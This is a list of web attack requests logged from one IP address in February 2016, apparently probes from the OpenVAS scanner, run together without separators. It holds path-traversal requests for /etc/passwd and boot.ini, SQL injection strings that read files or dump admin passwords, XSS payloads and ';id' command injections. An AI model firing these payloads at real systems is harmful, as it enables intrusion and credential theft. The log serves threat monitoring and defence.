List of web attacks b 161.202.76.38 on Feb 2, 2016
GETGET ././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../GET /GET /GET /GET /#welcomeGET /%00GET /%2bCSCOE%2b/win.jsGET /%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.iniGET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwdGET /%5C%5C..%2f..%2f..%2f..%2fboot.ini%%20../GET /%80../%80../%80../%80../%80../%80../%80../%80../boot.iniGET /%NETHOOD%/GET /..%5c..%5c..%5cboot.iniGET /.../.../.../.../.../.../.../.../.../.../boot.iniGET /../../../../../../../../etc/passwdGET /..\..\..\..\..\..\..\..\..\..\boot.iniGET /..\..\..\..\..\..\..\..\winnt\win.iniGET /..\pixfir~1\how_to_login.htmlGET /././..GET /.DS_StoreGET /.FBCIndexGET //GET //%3f.jspGET /////..%2f..%2f..%2f..%2fboot.iniGET //404.php?url=1%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3EGET //?lang=../../../../../../../../../etc/passwd%00.png&p_id=60GET //?p=GET //?upload_to=GET //AccountSections.php/%22%3E%3Cscript%3Ealert(/openvas-xss-test/);%3C/script%3EGET //ApplicationEngine//GET //Config/diff.php?file=;id&new=1&old=2GET //FormMail.plGET //IBSng/util/show_multistr.php?str=%3Cscript%3Ealert(/ovas-xss-test/)%3C/script%3EGET //LightNEasy.php?do=loginGET //Login.phpGET //Login/HostLogIn.asp?ie=0GET //Mondo/lang/sys/login.aspxGET //README.txtGET //UI/Login.jspGET //User-Edit.asp?UID=1%20OR%201=1GET //_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd%2500.jpg&picdir=Sample_Gallery&what=descriptionsGET //a_viewusers.php?s=1+UNION+SELECT+load_file(0x2f6574632f706173737764),null,null,null,null,null,null+limit+0GET //aboutGET //about-show.doGET //add.php?lang=../../../../../../../../../etc/passwd%00GET //admin/GET //admin/aindex.htmGET //admin/index.phpGET //admin/index.php?page=unexisting../../../../../../../../../../../../../../../../../../etc/passwd%00GET //admin/lib/gradient/gradient.php?tam=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00GET //admin/login.jspGET //admin/password_check_token.php?f_email=1&token=%22%3E%3Cscript%3Ealert%28/openvas-xss-test/%29;%3C/script%3EGET //admin/systemGET //admin/updatelist.php?filepath=../includes/settings.phpGET //afdrukken.php?page=%22%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3EGET //animation.php?board=b&id=1">GET //application/configs/application.iniGET //applicationengine/GET //assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=../../../../../../../../../../../../../boot.ini%00GET //assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=../../../../../../../../../../../../../etc/passwd%00GET //backend/plugin/Registration/index.php?confirm=%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3EGET //beerxml.php?r=null%20union%20select%201,2,3,4,5,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11GET //bin/view/TWiki/WebHomeGET //blob.phpGET //blogs.php?tag=gamecat+GET //cart.php?a=test&templatefile=../../../../../../../../../etc/passwd%00GET //charts.php?language=../../../../../../../../../etc/passwd%00AGET //charts/wizard/url.php?${phpinfo()}=1GET //city.php?hotel_city=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3EGET //classifieds/Site_Admin/admin.phpGET //cms/index.php?q=%3Cscript%3Ealert(0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374)%3C/script%3EGET //comment.php?blog=../../../../../../../../../etc/passwd%00GET //complete-modules/modules/forcedownload/force_download.php?filename=/etc/passwdGET //config.xml.savGET //content/dynpage_load.php?file=/boot.iniGET //content/dynpage_load.php?file=/etc/passwdGET //core/includes/gfw_smarty.php?config[gfwroot]=../../../../../../../../../boot.ini%00GET //core/includes/gfw_smarty.php?config[gfwroot]=../../../../../../../../../etc/passwd%00GET //cultbooking.php?lang=../../../../../../../../../etc/passwd%00GET //default.aspxGET //details_view.php?event_id=1&date=2000-12-01&view=month&loc=loc1&page_info_message=GET //display.php?filename=GET //do/view/TWiki/WebHomeGET //docs/CHANGELOGGET //docs/distribution/tour_page1.htmGET //down.php?filename=../../../../../../../../../../../../etc/passwd%00GET //download.php?id=-1+union+select+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374GET //download.php?id=2+AND+1=2+UNION+SELECT+1,2,3,4,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374--GET //download_file.php?path=../../../../../../../../../../../../../../../../../../etc/passwd%00GET //downloadfile.php?dwnfile=../../../../../../../../../../../../../../../etc/passwdGET //downlot.php?file=../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwdGET //extra/image.php?f=../../../../../../../../../etc/passwdGET //findagent.php?country1=%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3EGET //formmail.plGET //forum_answer.php?que_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,6,7,8,9,10/**/FROM/**/expert/*GET //fr_left.phpGET //frontend/js.php?module=../../../../../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=enGET //gallery.php?repertoire=../../../../../../../../../etc/passwd%00GET //gen/obj/collectivite.class.php?path_om=/boot.ini%00GET //gen/obj/collectivite.class.php?path_om=/etc/passwd%00GET //guestbook.phpGET //gzip_loader.php?file=../../../../../../../../../../../../../../../../etc/passwdGET //handlers/getpage.php?id=9999999+UNION+SELECT+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7+FROM+user+LIMIT+1GET //home.aspGET //home.phpGET //htdocs/index.phpGET //html/index.phpGET //includes/esqueletos/skel_null.php?ABTPV_BLOQUE_CENTRAL=/etc/passwdGET //includes/include.php?cct_base=../../../../../../../../../boot.ini%00GET //includes/include.php?cct_base=../../../../../../../../../etc/passwd%00GET //includes/initsystem.php?loader_file=../../../../../../../../../etc/passwd%00GET //includes/tiny_mce/plugins/filemanager/classes/FileManager/FileSystems/ZipFileImpl.php?basepath=/etc/passwd%00GET //includes/tiny_mce/plugins/imagemanager/config.php?basepath=/etc/passwd%00GET //includes/window_top.php?theme_file=../../../../../../../../../etc/passwd%00GET //index.aspGET //index.htmlGET //index.phpGET //index.phpGET //index.php/">GET //index.php/teachers.html?"/>GET //index.php?../../../../../../../boot.iniGET //index.php?../../../../../../../etc/passwdGET //index.php??p=../../../../../../../../../etc/passwd%00GET //index.php?GLOBALS[SKIN]=../../../../../../../../../etc/passwd%00GET //index.php?OPT_Session= OpenVAS_ReqGET //index.php?PathPrefix=../../../../../../../../../../../../../../../../../../etc/passwd%00GET //index.php?a=19&c=GET //index.php?action=template&template=../../../../../../../../../../../../../../../../../../etc/passwdGET //index.php?fct=preview&p=../../../../../../../../../../../../../../../../../../etc/passwd%00GET //index.php?from=";>>&help=true&page=What_is_wikiGET //index.php?id=-1'%20UNION%20SELECT%201,2,3,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9,10,11,12,13--+GET //index.php?lng=../../../../../../../../../etc/passwd%00GET //index.php?load=elite&view=1%3C/title%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3EGET //index.php?option=com_search&searchword=xss&ordering=%22%20onmouseover=alert(document.cookie)%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22GET //index.php?p=../../../../../../../../../..//etc/passwd%00GET //index.php?p=../../../../../../../../../../boot.ini%00GET //index.php?page=../../../../../../../../../../../../../../../../boot.ini%00GET //index.php?page=../../../../../../../../../../../../../../../../etc/passwd%00GET //index.php?page=../../../../../../../../../etc/passwdGET //index.php?page=../../../../../../../../../etc/passwd%00GET //index.php?page=/etc/passwdGET //index.php?page=1&c=&searchCart=">GET //index.php?page=profile&id=%27%20or%20%27a%27=%27aGET //index.php?page=viewbus&bus='GET //index.php?pg=1&d=../../../../../../../../../../../../../../../../../../GET //index.php?system=../../../../../../../../../etc/passwd%00GET //index.php?theme=../../../../../../../../../etc/passwd%00GET //index.php?typefilter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00GET //index.php?typefilter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00GET //index.phtmlGET //innoedit.cgi?download=;id|GET //install.php?dl=/../../../../../../../../../../../../../../etc/passwdGET //jobs.php?lang=../../../../../../../../../etc/passwd%00GET //koha/help.pl?url=koha/../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00.plGET //kommentar.php?filecat=">&fileid=0GET //language/en/text.php/GET //left.phpGET //lib/browsefiles.php?dir=/etcGET //lib/browsefolders.php?dir=/etcGET //library/PHPExcel/PHPExcel/Shared/JAMA/docs/download.php/%27%3E%3Cscript%3Ealert(/openvas-xss-test/);%3C/script%3EGET //library/lib.menu.php?rootpath=../../../../../../../../../../../../../../../boot.ini%00GET //library/lib.menu.php?rootpath=../../../../../../../../../../../../../../../etc/passwd%00GET //libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../../../../../../../../../../../../../../etc/passwd%00GET //loader-wizard.php?page=phpinfoGET //loginGET //login.cgiGET //login.phpGET //login.php?login=GET //login.plGET //login.wdm.GET //login/login.php?sessID=GET //main.phpGET //manager/index.phpGET //medialist.phpGET //message.php?skin=">GET //mod.php?mod=publisher&op=allmedia&artid=-1%20union%20select%200x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374GET //module.php?mod=GET //module/forum/main.php?website=../../../../../../../../../etc/passwd%00GET //modules.php?name=gallery&files=foobarGET //modules/profile/user.php?aXconf[default_language]=../../../../../../../../../../../../../../../../../../etc/passwd%00GET //news.php4?nid=-12'+union+select+1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4,5,6,7,8,9,10,11/*GET //news.php?wgo=666+and+1=2+union+all+select+0,1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8--GET //nowosci.php?a=1&str=%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3EGET //oldnews_reader.php?lang=../../../../../../../../../../../../../../../boot.ini%00GET //oldnews_reader.php?lang=../../../../../../../../../../../../../../../etc/passwd%00GET //openBrowser.php?url="onload="alert(/openvas-xss-test/)GET //page.php?id='GET //page.php?page=../../../../../../../../../etc/passwd%00GET //photo.php?id=-9999/**/union/**/select/**/1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374--GET //photo/templates/admin_default/confirm.tpl.php?nsextt=">GET //pivot/index.phpGET //pivotx/modules/module_image.php?image=GET //plugin/themes/default/page_forgot.php?apps_path[themes]=/etc/passwd%00GET //pmwiki.php?n=PmWiki.ReleaseNotesGET //portal/login.php?message=XSS%20Catched%20!%22))%3C/script%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3EGET //post.php?newsgroups=GET //print.php?page=../../../../../../../../../etc/passwdGET //prodpage.cfm?CFID=&CFTOKEN=&CategoryID='openvasGET //productionnu2/fileuploader.php?dir=../../../../../../../../../../../boot.ini%00GET //productionnu2/fileuploader.php?dir=../../../../../../../../../../../etc/passwd%00GET //productionnu2/report.php?StartingDirectory=../../../../../../../../../../../boot.ini%00GET //productionnu2/report.php?StartingDirectory=../../../../../../../../../../../etc/passwd%00GET //report.php?img_id=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3EGET //research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,null,null,nullGET //ress.php?page=../../../../../../../../../etc/passwd%00GET //revert.php?rev=%3Cscript%3Ealert(%27OpenVAS-XSS-Test%27)%3C/script%3EGET //scr/soustab.php?dsn[phptype]=../../../../../../../../../../../boot.ini%00GET //scr/soustab.php?dsn[phptype]=../../../../../../../../../../../etc/passwd%00GET //scripts/adminSection/main.aspGET //search.php3?bn=%3Cbody%20onload=alert(%27openvas-xss-test%27)%3EGET //search.php?bn=%3Cbody%20onload=alert(%27openvas-xss-test%27)%3EGET //search.php?q=GET //search.php?s=%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3EGET //search.php?seed=1%27GET //search.php?words=%25%27/%2A%2A/UNION/%2A%2A/SELECT/%2A%2A/1%2CCONCAT%28%27%3C1%3E%27%2Cname%2C%27%3A%27%2Cpassword%2C%27%3C2%3E%27%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10/%2A%2A/FROM/%2A%2A/site_administrators/%2A%2A/%23GET //searchresults.php?SearchTerm=">&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14GET //show_profile.php?custid=1+and+1=0+union+select+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,GET //signin.phpGET //site/login.phpGET //sitemap.php?id_site=GET //smarty.php?cwd=../../../../../../../../../etc/passwd%00GET //spip.phpGET //ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwdGET //star57.cgi?download=;id|GET //status.phpGET //sublink.php?langval=/etc/passwdGET //system/admin/modules.php?install=../../../../../../../../../etc/passwd%00GET //team.rc5-72.php?showlang=../../../../../../../../../etc/passwd%00GET //test/files.xml?action=download&file=/../../wikka.config.phpGET //themes/admin/default/modules/show.php?file=/boot.iniGET //themes/admin/default/modules/show.php?file=/etc/passwdGET //themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28/openvas-xss-test/%29;%3C/script%3EGET //ticketview.php?email=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E&id=1GET //tiki-index.phpGET //tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../../../../../../boot.ini%00GET //tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../../../../../../etc/passwd%00GET //title.htmlGET //titleBar.phpGET //upload/account-login.phpGET //upload/index.phpGET //users/login.phpGET //usr/extensions/get_tree.inc.php?GLOBALS[root_path]=/etc/passwd%00GET //utility/TagSelector.aspx?TagEditor=%27)%3C/script%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3EGET //vhosts/ehcp/?op=applyforaccountGET //viewfaqs.php?cat=-1+union+select+1GET //viewstory.php?id=-8+and+1=1+union+select+0,1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4GET //wa.exe?SHOWTPL=GET //web/?wicket:bookmarkablePage=:org.geoserver.web.AboutGeoServerPageGET //web/help.phpGET //webacc?User.interface=/../webacc/wmlGET //webapp/home.html?0GET //welcome.doGET //wiki/index.phpGET //windows/function.php?file=/etc/passwd&start=0&end=10